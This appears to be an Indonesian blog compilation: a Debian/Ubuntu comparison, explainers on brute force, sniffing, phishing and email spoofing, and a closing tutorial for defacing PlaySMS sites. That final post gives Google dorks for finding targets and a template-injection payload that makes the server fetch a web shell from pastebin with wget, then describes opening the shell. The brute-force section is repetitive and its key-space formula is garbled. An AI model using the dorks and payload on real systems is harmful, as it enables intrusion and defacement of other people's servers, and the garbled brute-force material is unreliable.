April 2020

Debian VS Ubuntu Server



Debian dan Ubuntu adalah salah satu rasa Linux yang paling banyak digunakan di dunia. Debian adalah sistem operasi open source yang dibangun di platform Linux. Pertama kali diumumkan pada tahun 1993 oleh Ian Murdock, Debian telah berkembang pesat dan terpental selama bertahun-tahun. Dengan lebih dari 50000 paket dalam repositorinya, Debian adalah salah satu sistem operasi paling serbaguna di dunia. Ini dipelihara dan dikembangkan oleh komunitas pengembang terampil yang kuat dari seluruh dunia.
Ubuntu adalah sistem operasi berbasis Linux Debian. Mirip dengan Debian, Ubuntu juga dibangun di lingkungan open-source, dimana pengembang didorong untuk memberikan masukan dan membantu mengembangkan sistem operasi. Itu diberi nama "Ubuntu" yang pada dasarnya berarti "human-ness". Dengan motif ini, Ubuntu menghadirkan GUI yang user-friendly agar mudah digunakan bagi pengguna. Ini banyak digunakan di smartphone, desktop maupun tablet.
Berikut adalah beberapa perbandingan yang membedakan antara, sebaliknya, sistem operasi yang sangat mirip.


Pengalaman yang User-friendly

Meskipun, kedua sistem operasi memiliki nuansa yang user-friendly, sistem operasi Ubuntu berhasil di departemen ini. Seperti namanya Ubuntu, sendiri mengemukakan, bahwa itu dirancang untuk kenyamanan pengguna. Sistem operasi Ubuntu dibangun untuk pengguna Linx pemula. Dengan GUI yang mudah digunakan dan pemasangan dan pembaruan yang mudah, ini memastikan pengguna yang tidak berpengalaman dapat melakukan tugas pada distribusi ini. Dengan bantuan Ubuntu Software Center, ini adalah jalan-jalan di taman untuk menginstal perangkat lunak baru.
Debian, di sisi lain, adalah sistem operasi yang sangat kuat dan kuat. Tapi lebih untuk tangan berpengalaman daripada pemula. Jika Anda tidak memiliki pengetahuan tentang distro Linux, ini akan menjadi tugas yang sulit untuk ditangani Debian.


Apakah Perangkat Keras Anda Kompatibel?

Satu lagi hal penting yang harus diingat adalah kompatibilitas perangkat keras Anda dengan sistem operasi. Sistem operasi Debian mendukung berbagai macam arsitektur perangkat keras mulai dari INTEL (standar 32 dan 64 bit), ARM dan PowerPC.
Ubuntu, di sisi lain, mendukung versi 32 dan 64-bit sebagai lingkungan desktop komputer dan sedang mengembangkan Ubuntu ARM untuk perangkat mobile.


Melepaskan

Paket Debian terbagi menjadi tiga kategori utama yaitu Unstable, Testing, dan Stabil. Paket tanpa diuji adalah versi yang tidak stabil. Setelah bug dikenali dengan versi, ia beralih ke proses pengujian. Setelah selesai diproses, versi Stabil dilepaskan.
Sebaliknya, Ubuntu merilis dua jenis versi LTS Ubuntu (Long Term Support) dan Ubuntu non-LTS. Versi LTS dilepaskan setiap dua tahun dengan update umumnya keluar setiap enam bulan. Ubuntu LTS adalah versi yang jauh lebih stabil daripada non-LTS. Ubuntu non-LTS atau versi standar dilepaskan setelah setiap enam bulan.


Komunitas dan Dukungan

Debian dikembangkan dan dikelola oleh sebuah komunitas yang terdiri dari pengembang yang sangat terampil yang bekerja secara sukarela. Setiap tahun masyarakat memilih pemimpin di antara mereka sendiri melalui metode Condorcet. Berbagai isu pada setiap aspek dibahas dalam forum Debian dan kesimpulannya tercapai dengan suara bulat. Untuk segala jenis Dukungan, Anda dapat selalu mengunjungi Debian Community and Forums.
Kontrasnya, dalam kasus sistem operasi Ubuntu, Anda bisa mendapatkan dukungan dari Canonical Ltd. dengan harga tertentu.


Apa yang harus dipilih: Debian atau Ubuntu

Debian dan Ubuntu keduanya memiliki basis pengguna yang sangat kontras. Jika Anda mencari sistem operasi yang kuat, aman dan efisien dan memiliki pengetahuan tentang Linux, Anda dapat selalu memilih Debian. Namun, untuk pemula, dianjurkan untuk memilih Ubuntu karena antarmuka yang user-friendly dan kemudahan pemasangan.

Pengertian Brute Force Attack - Teknik Hacking



Brute Force Attack adalah metode untuk meretas password (password cracking) dengan cara mencoba semua kemungkinan kombinasi yang ada pada “wordlist“. Wordlist yaitu sekumpulan kata angka bahkan simbol yg digunakan untuk mecrack password pada web maupun celah brute force. 

Metode ini dijamin akan berhasil menemukan password yang ingin diretas.
Namun, proses untuk meretas password dengan menggunakan metode ini akan memakan banyak waktu. Lamanya waktu akan ditentukan oleh panjang dan kombinasi karakter password yang akan diretas.

Istilah Brute Force sendiri di populerkan oleh Kenneth Thomson, dengan mottonya “When in doubt, use brute-force” (jika rugu, gunakan brute-force). Brute Force dapat digunakan untuk meretas password secara offline maupun online, namun kombinasi karakter password yang panjang terkadang membuat seorang attacker putus asa lalu menghentikan serangannya sehingga membuat metode ini menjadi sia-sia.

Suatu string terenkripsi dengan kata “key”, berikut adalah proses pemeriksaan brute force terhadap kata tersebut:

1. Proses Brute Force dengan mencoba hasil suatu hash untuk kemungkinan  karakter huruf (a) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force  akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

2. Proses Brute Force  dengan mencoba hasil hash untuk kemungkinan  karakter huruf (b) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force  akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

3. Proses Brute Force dengan mencoba hasil hash untuk kemungkinan  karakter huruf (a) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

4. Proses Brute Force dengan mencoba hasil hash untuk kemungkinan  karakter huruf (z) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

5. Proses Brute Force dengan mencoba hasil hash untuk kemungkinan  karakter huruf (aa) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

6. Proses Brute Force  dengan mencoba hasil hash untuk kemungkinan  karakter huruf (ab) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

7. Proses Brute Force  dengan mencoba hasil hash untuk kemungkinan  karakter huruf (az) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

8. Proses Brute Force  dengan mencoba hasil hash untuk kemungkinan  karakter huruf (bb) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

9. Proses Brute Force  dengan mencoba hasil hash untuk kemungkinan  karakter huruf (aaa) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

10. Proses Brute Force  dengan mencoba hasil hash untuk kemungkinan  karakter huruf (key).   Maka proses Brute Force akan berhenti di karakter huruf (key)  setelah mendapatkan kecocokan nilai hash  dari  kemungkinan contoh hash diatas dan password kembali seperti semula.

11. Nilai hash dari contoh kasus di atas =  e5be120b5be650ab8b37b491b018a15f

12. Proses Brute Force  dengan mencoba hasil hash untuk kemungkinan  karakter huruf (a) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force  akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

13.  Proses Brute Force  dengan mencoba hasil hash untuk kemungkinan  karakter huruf (b) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force  akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

14.  Proses Brute Force  dengan mencoba hasil hash untuk kemungkinan  karakter huruf (a) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force  akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

15.  Proses Brute Force  dengan mencoba hasil hash untuk kemungkinan  karakter huruf (z) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force  akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

16.  Proses Brute Force  dengan mencoba hasil hash untuk kemungkinan  karakter huruf (aa) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

17.  Proses Brute Force  dengan mencoba hasil hash untuk kemungkinan  karakter huruf (ab) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

18.  Proses Brute Force  dengan mencoba hasil hash untuk kemungkinan  karakter huruf (az) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force  akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

19.  Proses Brute Force  dengan mencoba hasil hash untuk kemungkinan  karakter huruf (bb) =  jika hasil hash telah cocok dengan contoh diatas maka poses Brute Force akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

20.  Proses Brute Force  dengan mencoba hasil hash untuk kemungkinan  karakter huruf (aaa) =  jika hasil hash MD5 telah cocok dengan contoh diatas maka poses Brute Force akan berhenti , jika tidak maka akan mencoba kemungkinan karakter huruf selanjutnya.

21.  Proses Brute Force dengan mencoba hasil hash untuk kemungkinan  karakter huruf  terakhir.
Brute Force Attack menggunakan formula sebagai berikut:

KS = L(m) + L(m+1) + L(m+2) + … + L(M)
Keterangan:
L = Jumlah karakter yang kita ingin definisikan
M = Panjang maksimum kata kunci
m = Panjang minimum kata kunci

Contoh jika kita ingin meretas password dengan panjang password 5 karakter dan hanya menggunakan kombinasi huruf kecil (‘a’ – ‘z’ = 26), maka Brute Force Cracker harus mencoba KS = 261 + 262 + 263 + … + 265 = 12356721 kata yang berbeda.

Seperti kata Kenneth Thomson, lakukanlah Brute Force jika anda merasa ragu dengan kombinasi karakter yang anda miliki

Apa itu Sniffing? Tipe-tipe dan cara kerja Sniffing


Sniffing adalah proses monitoring dan capturing semua paket yang melewati jaringan tertentu dengan menggunakan alat sniffing. Sniffing adalah bentuk “mendengarkan kabel telepon” dan mengenal percakapan. Mengetik dengan cara ini juga berlaku untuk jaringan komputer.
Ada begitu banyak kemungkinan bahwa jika satu set port switch perusahaan terbuka, maka salah satu pegawainya dapat mengetahui seluruh lalu lintas jaringan. Setiap pengguna di lokasi fisik yang sama dapat terhubung ke jaringan melalui kabel Ethernet atau membuat koneksi nirkabel ke jaringan dan mengetahui semua lalu lintas.



Sniffing Adalah
Dengan kata lain, Sniffing memungkinkan Anda melihat segala macam lalu lintas, protected dan unprotected. Di bawah kondisi dan protokol yang tepat, penyerang dapat mengumpulkan informasi yang dapat digunakan untuk serangan lebih lanjut atau menyebabkan masalah lain bagi pemilik jaringan atau sistem.
Daftar Isi :



Cara Kerja Sniffing

Seorang Sniffer, atau orang yang melakukan sniffing biasanya mengubah NIC sistem ke mode promiscous, sehingga bisa listen semua data yang dikirimkan pada tiap segmennya.
Mode promiscuous mengacu pada cara unik Ethernet, khususnya network interface cards (NICs), yang menerima semua lalu lintas jaringan bahkan jika itu tidak dialihkan ke NIC. Secara default NIC mengabaikan semua lalu lintas yang tidak ditujukan kepadanya. Untuk ini alamat tujuan paket Ethernet dibandingkan dengan alamat perangkat keras (a.k.a. MAC) perangkat. Meskipun hal ini masuk akal untuk jaringan pendekatan yang tidak berpihak membuat sulit untuk menggunakan perangkat lunak pemantauan dan analisis jaringan untuk mendiagnosis masalah konektivitas atau penghitungan lalu lintas.
Seperti ilustrasi di atas, sniffer dapat terus memantau semua lalu lintas ke komputer melalui NIC dengan decoding informasi yang dienkapsulasi dalam paket data.

Tipe-Tipe Sniffing

Sniffing bisa bersifat Aktif atau Pasif.

1. Sniffing Pasif

Dalam Sniffing Pasif, lalu lintas terkunci tapi tidak diubah dengan cara apapun. Sniffing Pasif hanya bisa listening. Sniffing pasif berfungsi pada perangkat hub. Perangkat hub mengirim lalu lintas ke semua port. Di jaringan yang menggunakan hub untuk menghubungkan sistem, semua host di jaringan dapat melihat lalu lintas. Ini memungkinkan penyerang untuk dengan mudah mendeteksi lalu lintas yang lewat.
Kabar baiknya adalah bahwa hub hampir usang sekarang ini. Sebagian besar jaringan modern menggunakan sakelar. Oleh karena itu, sniffing pasif tidak lagi efektif.

2. Sniffing Aktif

Dalam Sniffing Aktif, lalu lintas tidak hanya dikunci dan dipantau, tapi juga bisa diubah dengan cara yang ditentukan oleh serangan tersebut. Sniffing aktif digunakan untuk sniffing jaringan berbasis switch. Sniffing secara aktif menyuntikkan paket resolusi alamat ke jaringan tujuan untuk membanjiri tabel routing memori addressable memory (CAM). CAM melacak host mana yang terpasang pada port mana.

Apa yang Bisa di Sniffing?

Seseorang dapat meng sniffing informasi penting di jaringan komputer seperti:
  1. Lalu lintas email
  2. Kata sandi FTP
  3. Lalu lintas web
  4. Kata sandi telnet
  5. Konfigurasi router
  6. Sesi obrolan
  7. Lalu lintas DNS.

Protokol yang Digunakan Untuk Sniffing

Berikut adalah beberapa protokol jaringan komputer yang sering sniffer gunakan dalam melancarkan aksinya:
  1. HTTP – HTTP digunakan untuk mengirim informasi dalam teks yang jelas dan menjadikannya tujuan nyata.
  2. SMTP (Simple Mail Transfer Protocol) – SMTP pada dasarnya digunakan untuk transmisi email. Protokol ini efisien, tetapi tidak dianggap aman terhadap pengintaian.
  3. NNTP (Network News Transfer Protocol) – Digunakan untuk semua jenis komunikasi. Namun, kelemahan terbesarnya adalah bahwa data dan bahkan kata kunci dikirim melalui jaringan dalam bentuk teks biasa.
  4. POP (Post Office Protocol) – POP benar-benar digunakan untuk menerima email dari server. Protokol ini tidak menyediakan keamanan snoop, karena dapat menjadi perangkap yang mengirim virus
  5. FTP (File Transfer Protocol) – FTP digunakan untuk mengirim dan menerima file, tetapi tidak memberikan keamanan. Semua data dikirim sebagai teks yang dapat dengan mudah dipantau
  6. IMAP (Internet Message Access Protocol) – IMAP sama dengan SMTP tetapi rentan terhadap sniffing.
  7. Telnet – Telnet mengirimkan semuanya (nama pengguna, kata sandi, penekanan tombol) sebagai teks biasa melalui jaringan dan karenanya dapat dengan mudah di sniffing.
Sekian artikel tentang Sniffing ini semoga bisa memberi manfaat bagi kita semua, Terimakasih.

Apa itu web Phising? Ini pengertian nya



Phising adalah suatu metode yang di gunakan hacker untuk mencuri password dengan cara mengelabui target menggunakan fake form login pada situs palsu yang menyerupai situs aslinya.
pada beberapa kasus, situs palsu tersebut tidak terlalu mirip namun karena target kurang berhati hati dan tidak punya pengalaman tentang metode phishing maka bisa saja terjebak.
Istilah phishing dalam bahasa Inggris berasal dari kata fishing alias memancing, dalam hal ini maksudnya adalah memancing informasi dan kata sandi pengguna.

Cara Kerja Phising

1. Dengan suatu cara si peretas membuat kita melakukan klik terhadap link situs palsu mereka, bisa dengan sebuah gambar menarik di media sosial, bujukan pada email dan lain sebagainya.
2. Setelah melakukan klik, kita akan di arahkan ke situs palsu yang mana pada situs tersebut terdapat form isian misalnya form login facebook dengan kata kata yang meyakinkan bahwa facebook kita telah logout dan meminta kita memasukkan username dan password kembali. kita yang tidak menyangka bahwa situs tersebut hanyalah tiruan akan mengisi saja username dan password tanpa curiga.
3. Apa yang kita masukkan ke form isian itu akan tersimpan di server si peretas. Jadi kita masih punya waktu untuk merubah password kita sebelum si peretas melihat username dan password kita di servernya.
4. Akun kita akan di ambil alih. peretas kemungkinan besar menggunakan akun kita untuk menyebarkan url psihing ke teman teman kita untuk mendapatkan korban yang lebih banyak.
Meretas password dengan metode phishing adalah yang paling mudah di praktikkan, itu sebabnya banyak sekali di dunia maya tersebar rujukan alamat alamat yang mengarahkan browser kita ke alamat web pishing atau web palsu.
Mahir membuat design blog sudah cukup untuk dapat melakukan praktik phising.
Dengan membuat situs tiruan yang tidak sama persis pun kita masih tetap bisa melakukan metode phising ini, asalkan dapat meyakinkan si target. seperti situs phishing coc dengan embel embel mendapatkan gems gratis, atau situs phising BBM yang mana pada kenyataannya situs tersebut tidak pernah ada sebelumnya. namun korbannya banyak.

Apa itu Email spoofing? Dan bagaimana cara menghindarinya



Sistem kerja Email spoofing adalah memalsukan header email agar terlihat email tersebut dikirim oleh orang lain, bukan alamat email dari pengirim aslinya. Hal ini sering terjadi guna mengelabuhi penerima dalam menyampaikan pesan berbahaya, seperti SPAM ataupun password penting.
Jika anda menerima email bounce back padahal anda merasa tidak pernah mengirimkan pesan email tersebut, hal ini bisa dikatakan masuk dalam Spoofing.
Berikut bagaimana Spoofing terjadi:
1. Spammer (pembuat email spam) mencari dan menemukan sebuah email atau valid domain, contohnya salah satu akun anda sebagai korban. (Spammer menghabiskan waktu yang cukup lama/berhari-hari untuk hal ini)
2. Spammer mengirimkan email spam dalam jumlah yang sangat besar dan memakai email domain anda sebagai pengirimnya. Biasanya Spammer menggunakan software pemalsu khusus yang sangat sulit untuk dilacak. Software ini menghapus semua isi header dari emailnya, kemudian mengupdate isi header tersebut dengan user email akun anda sebagai pengirimnya.
3. Anda sebagai pihak korban, atau pihak yang tidak bersalah akan mendapatkan email bounce back dari alamat email yang tidak valid, atau alamat email yang mampu memblokir email spam.
4. Dalam seminggu, spammer akan dimatikan oleh penyedia layanan jaringan dikarenakan terdeteksi menggunakan bandwith yang tinggi, atau terdapat aktifitas spamming dengan traffic yang cukup tinggi.
5. Spammer mencari domain lain sebagai korban, dan seterusnya.
Sayangnya, masalah spoofing ini sangat sulit untuk dilacak. Dan pada umumnya banyak orang menyarankan untuk mengabaikan masalah ini.
Spoofing bisa saja menjadi hal yang sangat menganggu, dikarenakan masalah tersebut tidak dapat dihentikan. Spoofing bisa dianalogikan seperti surat menyurat yang dikirimkan kepada anda, dan menjadikan nama siapa saja sebagai pengirimnya. Bisa anda bayangkan betapa sulitnya untuk melacak pengirim aslinya.
Dalam sistem email, anda dapat mengurangi masalah spoofing ini dengan cara mengganti password email anda secara berkala. Bisa sebulan sekali, agar terhindar dari para Spammer yang selalu melacak/mencari celah untuk menjadikan anda sebagai korban spoofing.

Deface POC PlaySMS Unauthenticated RCE Upload Shell



Yo mina :v , kali ini w mau bagiin tutorial deface PlaySMS Unauthenticated RCE Upload, tanpa basa basi langsung saja ok.

# Google Dork :
- inurl:?app=main intitle:sms
- inurl:?app=main intext:"recover password"
#Payload RCE : 
- {{`wget https://pastebin.com/raw/YNpriSQu -O linuxploit.php`}}

Atau kalian bisa pakai payload lain selain ini gue pakai payload ini masuk sih tapi pas mau spawn kadang suka blank putih aja, atau kalian bisa buat shell sendiri. Usahakan mini shell yo. Oke lanjut


Langkah-Langkah Exploitasi

1. kalian dorking dulu

2. jika sudah menemukan target maka akan muncul tempat login

3. pada bagian username, masukkan payload rce : 
{{`wget https://pastebin.com/raw/YNpriSQu -O linuxploit.php`}}
Note : linuxploit.php bisa kalian ubah dengan nama sesuka kalian 

4. masukkan payload RCE pada username :

5. akses shell : target.com/namashell.php atau target.com/[path]/namashell.php
6. dan boom 

Source : Linuxploit.com

Kalau sudah seperti itu tinggal kalian upload shell saja. Mungkin sekian tutor dari w kurang lebih nya mohon maaf kalo belum paham contact me 👇


Arigato :'v